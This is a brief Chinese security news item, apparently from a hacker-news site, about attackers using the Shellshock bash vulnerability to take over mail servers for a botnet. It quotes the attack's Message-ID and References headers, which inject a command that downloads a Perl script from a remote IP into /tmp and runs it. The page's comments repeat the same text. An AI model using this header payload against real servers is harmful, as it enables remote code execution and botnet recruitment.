攻击者利用Shellshock漏洞入侵邮件服务器

攻击者利用Shellshock漏洞入侵邮件服务器

黑客接单访客2021-10-12 1:53:0010863A+A-

  攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。

  Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。

  邮件消息头的构成是:

  Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

  References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

 

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 馥妴路弥2022-06-03 20:25:16
  •   攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。  Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送
  • 假欢零栀2022-06-03 19:24:55
  •   攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。  Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息
  • 寻妄寒洲2022-06-03 09:41:46
  • 为僵尸网络的一部分。  邮件消息头的构成是:  Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend  References:() { :

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理